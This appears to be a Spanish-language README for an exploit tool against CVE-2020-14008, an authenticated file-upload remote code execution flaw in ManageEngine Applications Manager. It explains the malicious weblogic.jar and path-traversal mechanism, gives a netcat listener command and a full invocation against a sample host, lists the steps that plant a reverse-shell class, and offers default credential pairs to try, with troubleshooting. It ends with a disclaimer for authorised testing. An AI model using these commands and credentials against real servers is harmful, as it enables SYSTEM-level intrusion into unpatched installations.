
CVE-2020-14008 - ManageEngine Applications Manager RCE
Ejecución remota de código autenticada mediante carga arbitraria de archivos en Zoho ManageEngine Applications Manager (versiones <= 14720).
| Detalle | Valor |
|---|
| CVE | CVE-2020-14008 |
| CVSS | 7.2 (Alto) |
| Tipo | RCE autenticada / Carga arbitraria de archivos |
| Producto | Zoho ManageEngine Applications Manager |
| Afectado | Versión 14720 y anteriores |
| Requisito | Credenciales de administrador válidas |
| Resultado | Shell inversa a nivel de SYSTEM |
El exploit abusa de la función de prueba de credenciales del monitor Weblogic. Un administrador autenticado carga un archivo weblogic.jar malicioso en la ruta de biblioteca de Weblogic esperada. Cuando se activa la prueba de credenciales, ManageEngine carga weblogic.jndi.Environment desde el JAR subido a través de JarLoader.loadClass() y newInstance(), ejecutando código Java arbitrario.
javac y jar en PATH)nc (netcat) para capturar la shell inversapip3 install requests urllib3 lxml
nc -lvnp 1337
python3 cve-2020-14008.py <URL> <USUARIO> <CONTRASEÑA> <LHOST> <LPORT>
# Básico
python3 cve-2020-14008.py https://192.168.100.2:8443 admin admin 192.168.100.3 1337
weblogic.jndi.Environment) que contiene una shell inversa en weblogic.jarclasses/weblogic/version8/ mediante path traversal (alternativa: crear una tarea programada para moverlo)/testCredential.do, que carga e instancia la clase maliciosa| Usuario | Contraseña |
|---|---|
| admin | admin |
| admin | password |
| administrator | administrator |
| guest | guest |
| Error | Solución |
|---|---|
release version 7 not supported | Java 21+ eliminó el target Java 7. El script usa --release 8 |
FileNotFoundError: weblogic.jar | La compilación del JAR falló. Verificar que javac y jar estén en PATH |
No valid response from used session | Credenciales inválidas |
Actionname not found | Falló la creación de la tarea, verificar permisos de administrador |
Esta herramienta se proporciona únicamente para pruebas de penetración autorizadas e investigación de seguridad. El uso no autorizado contra sistemas que no posee o para los que no tiene permiso de prueba es ilegal.